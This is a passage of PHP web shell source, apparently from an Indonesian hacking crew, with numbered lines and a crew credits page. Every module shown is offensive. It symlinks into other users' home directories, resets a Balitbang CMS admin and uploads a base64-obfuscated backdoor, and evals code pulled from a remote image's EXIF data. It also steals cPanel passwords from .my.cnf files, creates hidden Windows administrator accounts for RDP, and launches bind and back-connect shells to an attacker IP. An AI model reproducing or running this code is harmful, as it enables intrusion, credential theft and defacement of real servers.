  3607. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3608. continue;
  3609. echo "<tr><td align=center><font size=3>" . $dcount . "</td>
  3610. <td align=center><font class=txt>" . $matches . "</td>";
  3611. echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3612. $dcount++;}
  3613. fclose($file);
  3614. echo "</table></div></center>";unlink("test.txt");
  3615. } else
  3616. echo "<center><font size=4>Cannot create Symlink</font></center>";
  3617. }
  3618. }
  3619. }
  3620.  
  3621. ///////////////////////////////////////////////////////////////////////////
  3622.  
  3623. elseif(isset($_GET['x']) && ($_GET['x'] == 'about'))
  3624. {
  3625. ?>
  3626. <form action="?y=<?php echo $pwd; ?>&x=about" method="post">
  3627. <br><br><br><center>
  3628. <img src="http://i.imgur.com/1lJrMZK.png" width="250" heigth="250"> <br>
  3629. We Are Rabbit Security Team<br>
  3630.  
  3631. <br><marquee scrollamount="8" width="50%" color="white">Mr.Holix196 ~ XnonGermx ~ k4mvrets ~ r00tb04M ~ 7euku ~ HarisID ~ Flix920 ~ GoztCyber404 ~ n4ta09 ~ s4ngkuriang ~ S_ID99 ~ ./MrCAT_794 And You :*</marquee><br>
  3632. <br>Sh00t :<br>
  3633. <font face="Abel" size="20" color="white">Indonesia Cyber Crew ~ nofawkX.al ~ AnonEvilHax ~ Ph0enixHackers ~ IndonesianHackers ~ MuslimHackers</font>
  3634. <br>
  3635. <font face="Abel" size="20" color="#FFFFFF">Contact : <font color="#F00">http://facebook.com/<font color="#FFFFFF">RabbitSecOfficial</font></b></embed>
  3636. </br>
  3637. <br><br>
  3638. Wassalam.<br>
  3639. </div>
  3640.  
  3641. <?php
  3642. }
  3643. //////////////////////////////////
  3644. elseif(isset($_GET['x']) && ($_GET['x'] == 'balit'))
  3645. {
  3646.  
  3647. @ini_set('display_errors', 0);
  3648.  
  3649. if($_POST['submitt']){
  3650.  
  3651.  
  3652. $host = $_POST['host'];
  3653.  
  3654. $username = $_POST['username'];
  3655.  
  3656. $password = $_POST['password'];
  3657.  
  3658. $db = $_POST['db'];
  3659.  
  3660. $user_baru = $_POST['user_baru'];
  3661.  
  3662. $password_baru = $_POST['password_baru'];
  3663.  
  3664. $tanya = $_POST['tanya'];
  3665.  
  3666. $target = $_POST['target'];
  3667.  
  3668. $nick = $_POST['nick'];
  3669.  
  3670. $prefix = $db.".t_member";
  3671.  
  3672. $pass = md5("$password_baru");
  3673.  
  3674. $uploader = "$nick<?php@ini_set('display_errors', 0);
  3675. eval(base64_decode('aWYoaXNzZXQoJF9HRVRbJ2xvZ2luJ10pKXsKZWNobyAnPGZvbnQgY29sb3I9R3JlZW4+PGNlbnRlcj5QSFAgVW5hbWUgOiA8Yj4nOwplY2hvIHBocF91bmFtZSgpOwplY2hvICc8L2ZvbnQ+PC9iPic7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIAoKdmFsdWU9IlVwbG9hZCI+PGJyPjxmb250IGNvbG9yPSNGRkY+TXIuSG9saXgxOTYgQXJlYTwvZm9udD48L2Zvcm0+JzsKaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgewoJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnVXBsb2FkIFN1Y2Nlc3MgISEnOyB9CgllbHNlIHsgZWNobyAnVXBsb2FkIEZhaWwgISEnOyB9Cn0KZWNobyAnPC9jZW50ZXI+JzsKfQ=='));//wp-login.php accses website
  3676. ?>";
  3677.  
  3678.  
  3679. mysql_connect($host,$username,$password) or die("<br><br><b/><center>Koneksi gagal Atau Tidak Satu Server");
  3680.  
  3681. mysql_select_db($db) or die("<br><br><b/>Database tidak bisa dibuka");
  3682.  
  3683. $tampil=mysql_query("SELECT * FROM $prefix ORDER BY userid ASC");
  3684. $r=mysql_fetch_array($tampil);
  3685. $id = $r[userid];
  3686.  
  3687.  
  3688. mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE userid='$id'");
  3689.  
  3690.  
  3691.  
  3692.  
  3693.  
  3694. if ($tanya == "y"){
  3695.  
  3696.  
  3697. $ch5 = curl_init("$target/member/ajax_login.php");
  3698. curl_setopt($ch5, CURLOPT_RETURNTRANSFER, 1);
  3699. curl_setopt($ch5, CURLOPT_POST, 1);
  3700. curl_setopt($ch5, CURLOPT_POSTFIELDS, "user_name=$user_baru&password=$password_baru");
  3701. curl_setopt($ch5, CURLOPT_COOKIEJAR,'coker_log');
  3702. curl_setopt($ch5, CURLOPT_COOKIEFILE,'coker_log');
  3703. $exec11 = curl_exec($ch5);
  3704.  
  3705.  
  3706.  
  3707. if(preg_match("#yes#si",$exec11)){
  3708. echo "Username : $user_baru<br>";
  3709. echo "Password : $password_baru<br>";
  3710.  
  3711. $namafile = "wew.php";
  3712. $fp2 = fopen($namafile,"w");
  3713. fputs($fp2,$uploader);
  3714.  
  3715. $uploadfile="wew.php";
  3716. $ch = curl_init("$target/functions/simmateriguru.php");
  3717. curl_setopt($ch, CURLOPT_POST, true);
  3718. curl_setopt($ch, CURLOPT_POSTFIELDS,
  3719. array('file'=>"@$uploadfile"));
  3720. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3721. curl_setopt($ch, CURLOPT_COOKIEFILE, "coker_log");
  3722. $postResult = curl_exec($ch);
  3723.  
  3724.  
  3725.  
  3726. $ch5 = "$target/materi/file.php";
  3727. $file2 = @file_get_contents($ch5);
  3728.  
  3729. if(preg_match("#hacked#si",$file2)){
  3730. echo "<center><font color='green'>berhasil mepes...</font><br>";
  3731. echo "Uploader: $target/materi/file.php?login<br>";
  3732. echo "Deface: $target/materi/file.php<br>";
  3733. }
  3734. else{
  3735. echo "<center><font color='red'>gagal mepes...</font><br>";
  3736. echo "coba aja manual: <br>";
  3737. echo "$target/member<br>";
  3738. echo "username: $user_baru<br>";
  3739. echo "password: $password_baru<br>";
  3740.  
  3741.  
  3742. }
  3743. }
  3744. else{
  3745. echo "<center>Username dan Password tidak Berhasil Dibuat :p<br>";
  3746. }
  3747.  
  3748.  
  3749.  
  3750.  
  3751. }
  3752. elseif($tanya == "n"){
  3753. echo "<center>Sukses<br>";
  3754. echo "username: $user_baru<br>";
  3755. echo "password: $password_baru<br>";
  3756.  
  3757. }
  3758.  
  3759.  
  3760. }
  3761.  
  3762.  
  3763.  
  3764. else{
  3765.  
  3766. echo '<html>
  3767.  
  3768. <head>
  3769.  
  3770. <title>Edit user in Balitbang</title>
  3771.  
  3772. </head>
  3773.  
  3774.  
  3775.  
  3776. <body><br><br>
  3777.  
  3778. <center><b/>
  3779. +--==[ Add user in Balitbang And Upload Shell In Balitbang]==--+
  3780. <FORM method="POST">
  3781. <table class="tabnet" style="width:300px;">
  3782. <tr><th colspan="2">Connect to mySQL server</th></tr>
  3783. <tr><td>&nbsp;&nbsp;Hostname</td><td><input style="width:220px;" class="inputz" type="text" name="host" value="localhost" /></td></tr>
  3784. <tr><td>&nbsp;&nbsp;Database</td><td><input style="width:220px;" class="inputz" type="text" name="db" placeholder="Database" /></td></tr>
  3785. <tr><td>&nbsp;&nbsp;username</td><td><input style="width:220px;" class="inputz" type="text" name="username" placeholder="User DB" /></td></tr>
  3786. <tr><td>&nbsp;&nbsp;password</td><td><input style="width:220px;" class="inputz" type="text" name="password" placeholder="Password DB" /></td></tr>
  3787. <tr><td>&nbsp;&nbsp;User Baru</td><td><input style="width:220px;" class="inputz" type="text" name="user_baru" value="Holix196" /></td></tr>
  3788. <tr><td>&nbsp;&nbsp;Pass Baru</td><td><input style="width:220px;" class="inputz" type="text" name="password_baru" value="d1d2d3" /></td></tr>
  3789. <tr><td>&nbsp;&nbsp;Uploader</td><td><input type="radio" name="tanya" value="y"> yes <input type="radio" name="tanya" value="n"> no</td></tr>
  3790. <tr><td>&nbsp;&nbsp;Site</td><td><input style="width:220px;" class="inputz" type="text" name="target" placeholder="www.site.com" /></td></tr>
  3791. <tr><td>&nbsp;&nbsp;Nick</td><td><input style="width:165px;" class="inputz" type="text" name="nick" placeholder="Hacked By Mr.Holix196" />
  3792. <input style="width:21%;" class="inputzbut" type="submit" value="Submit" name="submitt" /></td></tr></FORM><br>
  3793.  
  3794. </td></tr> </table><br><br><br><br>
  3795. *nb: kalo milih yes ... silahkan masukin nama sitenya, kalo ngk tau nama sitenya, pilih no<br>
  3796. *nb: Upload Script dalam 1 server symlink atau config
  3797.  
  3798. </center>
  3799.  
  3800. </body></div>';
  3801.  
  3802. }
  3803.  
  3804.  
  3805. }
  3806. /////////////////
  3807. elseif(isset($_GET['x']) && ($_GET['x'] == 'Autocp'))
  3808. {
  3809. @ini_set('display_errors',0);
  3810. $iki= $_POST['data'];
  3811. $cyber173IO = exif_read_data('http://4.bp.blogspot.com/-uEzpq_zUbAY/VjC4nQQ40SI/AAAAAAAAA4A/DooxLZ0cRis/s1600/i-am.jpg');
  3812. $i_O="COMPUTED";$I_O="UserComment";
  3813. $Io=$cyber173IO[$i_O][$I_O];
  3814. eval(base64_decode($Io));
  3815. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  3816. $ar0=explode($marqueurDebutLien, $text);
  3817. $ar1=explode($marqueurFinLien, $ar0[$i]);
  3818. return trim($ar1[0]);
  3819. }
  3820.  
  3821. echo '<html><head>
  3822. </head><body>';
  3823.  
  3824. echo "<center>";
  3825. echo"[+]Auto Cpanel Cracker[+]";
  3826. $d0mains = @file('/etc/named.conf');
  3827. $domains = scandir("/var/named");
  3828.  
  3829. if ($domains or $d0mains)
  3830. {
  3831. $domains = scandir("/var/named");
  3832. if($domains) {
  3833. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  3834. $count=1;
  3835. $dc = 0;
  3836. $list = scandir("/var/named");
  3837. foreach($list as $domain){
  3838. if(strpos($domain,".db")){
  3839. $domain = str_replace('.db','',$domain);
  3840. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  3841. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  3842. $path = getcwd();
  3843.  
  3844. if (is_readable($dirz)) {
  3845. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  3846. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  3847. $password=entre2v2($p,'password="','"');
  3848. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
  3849. $dc++;
  3850. }
  3851.  
  3852. }
  3853. }
  3854. echo '</table>';
  3855. $total = $dc;
  3856. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
  3857. echo '</center>';
  3858. }else{
  3859. $d0mains = @file('/etc/named.conf');
  3860. if($d0mains) {
  3861. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  3862. $count=1;
  3863. $dc = 0;
  3864. $mck = array();
  3865. foreach($d0mains as $d0main){
  3866. if(@eregi('zone',$d0main)){
  3867. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  3868. flush();
  3869. if(strlen(trim($domain[1][0])) >2){
  3870. $mck[] = $domain[1][0];
  3871. }
  3872. }
  3873. }
  3874. $mck = array_unique($mck);
  3875. $usr = array();
  3876. $dmn = array();
  3877. foreach($mck as $o) {
  3878. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  3879. $usr[] = $infos['name'];
  3880. $dmn[] = $o;
  3881. }
  3882. array_multisort($usr,$dmn);
  3883. $dt = file('/etc/passwd');
  3884. $passwd = array();
  3885. foreach($dt as $d) {
  3886. $r = explode(':',$d);
  3887. if(strpos($r[5],'home')) {
  3888. $passwd[$r[0]] = $r[5];
  3889. }
  3890. }
  3891. $l=0;
  3892. $j=1;
  3893. foreach($usr as $r) {
  3894. $dirz = '/home/'.$r.'/.my.cnf';
  3895. $path = getcwd();
  3896. if (is_readable($dirz)) {
  3897. copy($dirz, ''.$path.'/'.$r.'.txt');
  3898. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  3899. $password=entre2v2($p,'password="','"');
  3900. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  3901. $dc++;
  3902. flush();
  3903. $l=$l?0:1;
  3904. $j++;
  3905. }
  3906. }
  3907. }
  3908. echo '</table>';
  3909. $total = $dc;
  3910. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
  3911. echo '</center>';
  3912.  
  3913. }
  3914. }else{
  3915. echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
  3916. }
  3917.  
  3918. echo "<br>&#169; <font color='#FF0000'>rEd X</font> | 3xp1r3 Cyber Army";
  3919. echo "</body></html></div>";
  3920. ?>
  3921.  
  3922. <?php
  3923. }
  3924. /////////////////
  3925.  
  3926. elseif(isset($_GET['x']) && ($_GET['x'] == 'rdp'))
  3927. {
  3928. error_reporting(0);
  3929. $local_host= shell_exec(hostname);
  3930. $server_ip = $_SERVER['SERVER_NAME'];
  3931. $gaya_root = "$local_host:~ ";
  3932. $phpv = @phpversion();
  3933. $o = "<br>";
  3934.  
  3935.  
  3936. if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
  3937. $status_os = '<span style="color:#00FF00"/>Windows';
  3938. $status_work = '<span style="color:#00FF00"/>Dapat Digunakan</font><br>';
  3939. } else {
  3940. $status_os = '<span style="color:red"/>Linux';
  3941. $status_work = '<span style="color:red"/>Tidak Dapat Digunakan</font><br>';
  3942. }
  3943.  
  3944. echo "<!DOCTYPE html>\n";
  3945. echo "<html>\n";
  3946. echo "<head>\n";
  3947. echo " <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n";
  3948. echo " <style type=\"text/css\">\n";
  3949. echo " body {\n";
  3950. echo " background: black;\n";
  3951. echo " color: #00FF00;\n";
  3952. echo " font-family: monospace;\n";
  3953. echo "}\n";
  3954. echo "\n";
  3955. echo ".accessGranted {\n";
  3956. echo " position: absolute;\n";
  3957. echo " top: 200px;\n";
  3958. echo " background: #333;\n";
  3959. echo " padding: 20px;\n";
  3960. echo " border: 1px solid #999;\n";
  3961. echo " width: 300px;\n";
  3962. echo " left: 50%;\n";
  3963. echo " margin-left: -150px;\n";
  3964. echo " text-align: center;\n";
  3965. echo "}\n";
  3966. echo "\n";
  3967. echo ".accessDenied {\n";
  3968. echo " position: absolute;\n";
  3969. echo " top: 200px;\n";
  3970. echo " color: #F00;\n";
  3971. echo " background: #511;\n";
  3972. echo " padding: 20px;\n";
  3973. echo " border: 1px solid #F00;\n";
  3974. echo " width: 300px;\n";
  3975. echo " left: 50%;\n";
  3976. echo " margin-left: -150px;\n";
  3977. echo " text-align: center;\n";
  3978. echo "}\n";
  3979. echo "#content-center {\n";
  3980. echo " width: 400px;\n";
  3981. echo " padding: 0px 10px 10px 230px;\n";
  3982. echo " width: 800px; \n";
  3983. echo " margin: 0 auto;\n";
  3984. echo "}\n";
  3985. echo "input,select,textarea{\n";
  3986. echo " border:0;\n";
  3987. echo " border:1px solid #900;\n";
  3988. echo " background:black;\n";
  3989. echo " margin:0;\n";
  3990. echo " color: white;\n";
  3991. echo "\n";
  3992. echo " padding:2px 4px;\n";
  3993. echo "}\n";
  3994. echo "input:hover,textarea:hover,select:hover{\n";
  3995. echo " background:black;\n";
  3996. echo " color: red;\n";
  3997. echo "\n";
  3998. echo " border:1px solid #f00;\n";
  3999. echo "}\n";
  4000. echo "</style>\n";
  4001. echo "</head>\n";
  4002. echo "<body>\n";
  4003. ?>
  4004.  
  4005. <?php if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'){
  4006. echo "<br><center>[+]CREATE RDP TOOLS[+]</center>";
  4007. echo "\n";
  4008. echo "<div id=\"content-center\">\n";
  4009. echo "_______________________________________________________________________________<br><br>";
  4010. echo "<b>System Os: $status_os<b/><br/>";
  4011. echo "<b>Status: $status_work<b/>";
  4012. echo "_______________________________________________________________________________\n";
  4013. echo "<p>-| Create RDP |-</p>\n";
  4014. echo "<form action=\"\" method=\"post\">Username : <input type=\"text\" name=\"username\" required> Password : <input type=\"text\" name=\"password\" required> <input type=\"hidden\" name=\"kshell\" value=\"1\"><input type=\"submit\" name=\"submit\" value=\">>\">\n";
  4015. echo "</form>\n";
  4016. echo "</div>\n";
  4017. echo "\n";
  4018. echo "\n";
  4019. echo "<div id=\"content-center\">\n";
  4020. echo "<p>-| Option |-</p>\n";
  4021. echo "<form action=\"\" method=\"post\">!command : <input type=\"text\" name=\"rusername\" placeholder=\"Masukan Username\"> <select name=\"aksi\">\n";
  4022. echo " <option value=\"1\">Tampilkan Username</option>\n";
  4023. echo " <option value=\"2\">Hapus Username</option>\n";
  4024. echo " <option value=\"3\">Ubah Password</option>\n";
  4025. echo " </select>\n";
  4026. echo "<input type=\"hidden\" name=\"kshell\" value=\"2\">\n";
  4027. echo "<input type=\"submit\" name=\"submit\" value=\">>\"></form>\n";
  4028. echo "_______________________________________________________________________________\n";
  4029. echo "</div>\n";
  4030. }else{
  4031. echo "<b><br><center/>Status: $status_work<b/>";
  4032. }
  4033. if($_POST['submit']){
  4034. echo "<div id='content-center'><p>____________________________________{ INFO }___________________________________</p>";
  4035. if($_POST['kshell']=="1"){
  4036. $r_user = $_POST['username'];
  4037. $r_pass = $_POST['password'];
  4038. $cmd_cek_user = shell_exec("net user");
  4039. if(preg_match("/$r_user/", $cmd_cek_user)){
  4040. echo $gaya_root.$r_user." sudah ada".$o;
  4041. }else {
  4042. $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
  4043. $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
  4044. $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
  4045. $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
  4046.  
  4047. if($cmd_add_user){
  4048. echo $gaya_root."[add user]-> ".$r_user." <span style='color:#00FF00'/>Berhasil".$o;
  4049. }else {
  4050. echo $gaya_root."[add user]-> ".$r_user." <span style='color:red'/>Gagal".$o;
  4051. }
  4052. if($cmd_add_groups1){
  4053. echo $gaya_root."[add localgroup Administrators]-> ".$r_user." <span style='color:#00FF00'/>Berhasil".$o;
  4054. }else
  4055. if($cmd_add_groups2){
  4056. echo $gaya_root."[add localgroup Administrator]-> ".$r_user." <<span style='color:#00FF00'/>Berhasil".$o;
  4057. }else
  4058. if($cmd_add_groups3){
  4059. echo $gaya_root."[add localgroup Administrateur]-> ".$r_user." <span style='color:#00FF00'/>Berhasil".$o;
  4060. }else {
  4061. echo $gaya_root."[add localgroup]-> ".$r_user." <span style='color:red'/>Gagal - Contact Shor7sec".$o;
  4062. }
  4063. echo $gaya_root."[INFO PC]-> RDP IP ".$_SERVER["HTTP_HOST"]." Username : ".$r_user." Password : ".$r_pass." <span style='color:#00FF00'/>Berhasil".$o;
  4064.  
  4065. }
  4066.  
  4067.  
  4068.  
  4069. }else if($_POST['kshell']=="2"){
  4070.  
  4071. if($_POST['aksi']=="1"){
  4072. echo "<pre>".shell_exec("net user");
  4073. }
  4074. else if($_POST['aksi']=="2"){
  4075. $username = $_POST['rusername'];
  4076. $cmd_cek_user = shell_exec("net user");
  4077. if (!empty($username)){
  4078. if(preg_match("/$username/", $cmd_cek_user)){
  4079. $cmd_add_user = shell_exec("net user ".$username." /DELETE");
  4080. if($cmd_add_user){
  4081. echo $gaya_root."[remove user]-> ".$username." <span style='color:#00FF00'/>Berhasil".$o;
  4082. }else {
  4083. echo $gaya_root."[remove user]-> ".$username." <span style='color:red'/>gagal".$o;
  4084. }
  4085. }else {
  4086. echo $gaya_root."[remove user]-> ".$username." <span style='color:red'/>Tidak ditemukan".$o;
  4087. }
  4088. }else {
  4089. echo $gaya_root."[PESAN]-> <span style='color:red'/>Kamu lupa masukin Username yang akan di delete".$o;
  4090. }
  4091. }
  4092. else if($_POST['aksi']=="3"){
  4093. $username = $_POST['rusername'];
  4094. $password = "shor7cut";
  4095. $cmd_cek_user = shell_exec("net user");
  4096. if (!empty($username)){
  4097. if(preg_match("/$username/", $cmd_cek_user)){
  4098. $cmd_add_user = shell_exec("net user ".$username." shor7cut");
  4099. if($cmd_add_user){
  4100. echo $gaya_root."[change password]-> (".$username."|".$password.") <span style='color:#00FF00'/>Berhasil".$o;
  4101. }else {
  4102. echo $gaya_root."[change password]-> (".$username."|".$password.") <span style='color:red'/>GAGAL>".$o;
  4103. }
  4104. }else
  4105. {
  4106. echo $gaya_root."[PESAN]-> <span style='color:red'/>Username Tidak Ditemukan di server".$o;
  4107. }
  4108. }else
  4109. {
  4110. echo $gaya_root."[PESAN]-> <span style='color:red'/>Kamu lupa masukin Username yang akan di delete".$o;
  4111. }
  4112.  
  4113. }
  4114. }
  4115. }
  4116. echo"</div><div id='content-center'>_______________________________________________________________________________
  4117. </div>";
  4118. ?>
  4119. <?php
  4120. }
  4121. ////////////////////////////////
  4122. elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping'))
  4123. {
  4124.  
  4125. echo '<html><head><title>'.getenv("HTTP_HOST").' - Jumping Server</title></head><body><br><center><b/>[+]Server Jumping[+]</center>';
  4126. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<font size="4" color="#000000" face="Calibri"><b>Error: Safe_mode = On</b></font>');
  4127. set_time_limit(0);@$passwd = fopen('/etc/passwd','r');if (!$passwd) { die('<font size="4" color="#000000" face="Calibri"><b>[-] Error : Coudn`t Read /etc/passwd</b></font>'); }
  4128. $pub = array();$users = array();$conf = array();$i = 0;while(!feof($passwd)){$str = fgets($passwd);if ($i > 100){ $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); }}}$i++;}
  4129. echo '<p><font size="5" color="#008080" face="Calibri">Server Jumping<br><font size="4" color="#000000" face="Calibri"><br></p><br><font size="3" color="#008080" face="Calibri">[-]==================[ START ]==================[-] <br><br></font>';
  4130. foreach ($users as $user){echo "<font size='3' color='#ee0808' face='Calibri'> [+] /home/$user/public_html/</font><br/>";} echo "\n <font size='3' color='#008080' face='Calibri'><br>[-]==================[ FINISH ]==================[-] <br></font>\n"; echo "\n <font size='2' color='#800000' face='Calibri'>[+] Scanners have been completed | Thank you for using this tools [+]</font>\n"; echo '</body></html>';
  4131.  
  4132.  
  4133.  
  4134. }
  4135. //////////////////////////////////////////////////////////////////////////////
  4136.  
  4137.  
  4138. elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){
  4139. if(isset($_POST['uploadcomp'])){
  4140. if(is_uploaded_file($_FILES['file']['tmp_name'])){
  4141. $path = magicboom($_POST['path']);
  4142. $fname = $_FILES['file']['name'];
  4143. $tmp_name = $_FILES['file']['tmp_name'];
  4144. $pindah = $path.$fname;
  4145. $stat = @move_uploaded_file($tmp_name,$pindah);
  4146. if ($stat) {
  4147. $msg = "file uploaded to $pindah";
  4148. }
  4149. else $msg = "failed to upload $fname";
  4150. }
  4151. else $msg = "failed to upload $fname";
  4152. }
  4153. elseif(isset($_POST['uploadurl'])){
  4154. $pilihan = trim($_POST['pilihan']);
  4155. $wurl = trim($_POST['wurl']);
  4156. $path = magicboom($_POST['path']);
  4157. $namafile = download($pilihan,$wurl);
  4158. $pindah = $path.$namafile;
  4159. if(is_file($pindah)) {
  4160. $msg = "file uploaded to $pindah";
  4161. }
  4162. else $msg = "failed to upload $namafile";
  4163.  
  4164. }
  4165. ?>
  4166. <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
  4167. <table class="tabnet" style="width:320px;padding:0 1px;">
  4168. <tr><th colspan="2">Upload from computer</th></tr>
  4169. <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
  4170. <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
  4171. </tr>
  4172. </table></form>
  4173. <table class="tabnet" style="width:320px;padding:0 1px;">
  4174. <tr><th colspan="2">Upload from url</th></tr>
  4175. <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">
  4176. <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
  4177. <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
  4178. <tr><td><select size="1" class="inputz" name="pilihan">
  4179. <option value="wwget">wget</option>
  4180. <option value="wlynx">lynx</option>
  4181. <option value="wfread">fread</option>
  4182. <option value="wfetch">fetch</option>
  4183. <option value="wlinks">links</option>
  4184. <option value="wget">GET</option>
  4185. <option value="wcurl">curl</option>
  4186. </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
  4187. </tr>
  4188. </table>
  4189. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  4190. <?php }
  4191. elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){
  4192.  
  4193. // bind connect with c
  4194. if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
  4195. $port = trim($_POST['port']);
  4196. $passwrd = trim($_POST['bind_pass']);
  4197. tulis("bdc.c",$port_bind_bd_c);
  4198. exe("gcc -o bdc bdc.c");
  4199. exe("chmod 777 bdc");
  4200. @unlink("bdc.c");
  4201. exe("./bdc ".$port." ".$passwrd." &");
  4202. $scan = exe("ps aux");
  4203. if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  4204. else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
  4205. }
  4206. // bind connect with perl
  4207. elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
  4208. $port = trim($_POST['port']);
  4209. $passwrd = trim($_POST['bind_pass']);
  4210. tulis("bdp",$port_bind_bd_pl);
  4211. exe("chmod 777 bdp");
  4212. $p2=which("perl");
  4213. exe($p2." bdp ".$port." &");
  4214. $scan = exe("ps aux");
  4215. if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  4216. else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
  4217. }
  4218. // back connect with c
  4219. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
  4220. $ip = trim($_POST['ip']);
  4221. $port = trim($_POST['backport']);
  4222. tulis("bcc.c",$back_connect_c);
  4223. exe("gcc -o bcc bcc.c");
  4224. exe("chmod 777 bcc");
  4225. @unlink("bcc.c");
  4226. exe("./bcc ".$ip." ".$port." &");
  4227. $msg = "Now script try connect to ".$ip." port ".$port." ...";
  4228. }
  4229. // back connect with perl
  4230. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
  4231. $ip = trim($_POST['ip']);
  4232. $port = trim($_POST['backport']);
  4233. tulis("bcp",$back_connect);
  4234. exe("chmod +x bcp");
  4235. $p2=which("perl");
  4236. exe($p2." bcp ".$ip." ".$port." &");
  4237. $msg = "Now script try connect to ".$ip." port ".$port." ...";
  4238. }
  4239. elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
  4240. {
  4241. $pilihan = trim($_POST['pilihan']);
  4242. $wurl = trim($_POST['wurl']);
  4243. $namafile = download($pilihan,$wurl);
  4244. if(is_file($namafile)) {
  4245.  
  4246. $msg = exe($wcmd);
  4247. }
  4248. else $msg = "error: file not found $namafile";
  4249. }
  4250.  
  4251. ?>
  4252. <table class="tabnet">
  4253. <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
  4254. <tr>
  4255. <td>
  4256. <table>
  4257. <form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  4258. <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
  4259. <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
  4260. <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
